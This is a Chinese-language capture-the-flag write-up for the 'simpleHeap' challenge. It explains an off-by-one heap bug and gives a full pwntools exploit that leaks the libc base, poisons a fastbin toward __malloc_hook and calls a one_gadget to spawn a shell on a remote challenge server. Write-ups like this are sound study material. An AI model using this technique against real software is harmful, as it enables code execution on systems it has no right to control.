【Pwn】V&N2020 公开赛 simpleHeap
1、静态分析
首先libc版本是ubuntu16的2.23版本,可以去buu的资源处下载
然后checksec一下,保护全开
拖入IDA中分析
去除了符号表,通过menu函数分析出有add、edit、show、delete
1.add()
add函数分析一遍,发现没什么漏洞,就是普普通通的输入一个需要申请的size(空间大小),然后再向这个malloc的空间中输入content(内容),其中size不能大于111(0x6F)。
2.edit()
edit的功能就是输入一个index,然后修改这个index的内容。
问题出在了in(我自己重命名的)这个函数上,这个函数的功能是给prt[index]读入Size[index]大小的内容,但是我们进入这个函数看一看
其中红框的部分造成了off-by-one的漏洞,如果i == length那么其实会多写入一个字节,利用这个漏洞我们可以去篡改物理相邻的下一个chunk的size字段的最后一个字节,也就是给这个chunk的size给重写
3.show()
show函数就是把我们想要的index的content打印出来
没有漏洞存在
4.delete()
delete函数不仅free了ptr,还把ptr置为了NULL,不存在UAF和double free的漏洞
2、漏洞利用
分析完了上述的4种主要函数,发现能够利用的漏洞只有edit中的off-by-one一个点。那么如何通过这一个off-by-one的漏洞来获取shell呢?
exp如下:
from pwn import *
from LibcSearcher import *
# context.log_level="DEBUG"
def ret2libc(leak,func,path=""):
if path == "":
libc = LibcSearcher(fun,leak)
base = leak - libc.dump(func)
system = base + libc.dump("system")
binsh = base + libc.dump("str_bin_sh")
else:
libc = ELF(path)
libc.address = leak - libc.sym[func]
system = libc.sym["system"]
binsh = next(libc.search(b"/bin/sh"))
return (system,binsh)
s = lambda data : io.send(data)
sa = lambda str1,data : io.sendafter(str1,data)
sl = lambda data : io.sendline(data)
sla = lambda str1,data : io.sendlineafter(str1,data)
r = lambda num : io.recv(num)
ru = lambda data,drop=True : io.recvuntil(data,drop)
ia = lambda : io.interactive()
uu32 = lambda data : u32(data.ljust(4,b"\x00"))
uu64 = lambda data : u64(data.ljust(8,b"\x00"))
leak = lambda name,addr : log.success('{} = {:#x}'.format(name, addr))
dbg = lambda : gdb.attach(io)
# io = process("./vn_pwn_simpleHeap")
io = remote("node4.buuoj.cn",27610)
elf = ELF("./vn_pwn_simpleHeap")
libc = ELF("./libc-2.23.so")
def add(size,content="a"):
sla(":","1")
sla("?",str(size))
sa(":",content)
def edit(index,content):
sla(":","2")
sla("?",str(index))
sla(":",content)
def show(index):
sla(":","3")
sla("?",str(index))
def free(index):
sla(":","4")
sla("?",str(index))
# start
add(0x18) # 0
add(0x68) # 1
add(0x68) # 2
add(0x18) # 3
edit(0,b"a"*0x18+b"\xe1") # 篡改1的size为e1,欺骗unsoted bin回收 1和2 这一个整体
free(1) # unsorted bin 回收了 1和2 这一块内存空间,但是 2 的指针仍然存在
add(0x68) # 将 1 从unsorted bin中分割出来,剩下的一半2仍然再unsorted bin中,用来泄露libc
show(2) # 用 2 来泄露main arean的地址,再减去0x10泄露出malloc_hook的地址,进而泄露出libc地址
base = uu64(r(6))- 88 - 0x10 - libc.sym["__malloc_hook"]
leak("base",base)
malloc_hook = base + libc.sym["__malloc_hook"]
add(0x60) # 4 <-> 2
free(3)
free(2)
edit(4,p64(malloc_hook-0x23)) # 将 2 的fd指针改为 malloc_hook - 0x23,这里其实是一个欺骗fastbin的位置,因为这里的size是0x7f,属于fastbin的范围
add(0x60) # 将 2 重新申请回来,此时的2的fd指针已经改写为了fake chunk的地址
payload = b"a"*11+p64(base+0x4526a)+p64(base+libc.sym["__libc_realloc"]+0xc) # 通过one_gadget来获取shell,但是这里选择的one_gadget rsp+0x30 == null无法满足,所以要去realloc中通过push、pop操作(也就是rsp+0x30-5*8==null)来满足条件,最后将one_gadget写入realloc_hook中
add(0x60,payload)
sla(":","1")
sla("?","1") # malloc发现malloc_hook不为空,去调用malloc_hook里面的realloc+0xc,realloc发现realloc_hook不为空,可以执行realloc下面一系列的pop操作,调节了栈帧,满足了one_gadget的条件,最后调用了realloc_hook中的one_gadeget从而获取了shell
ia()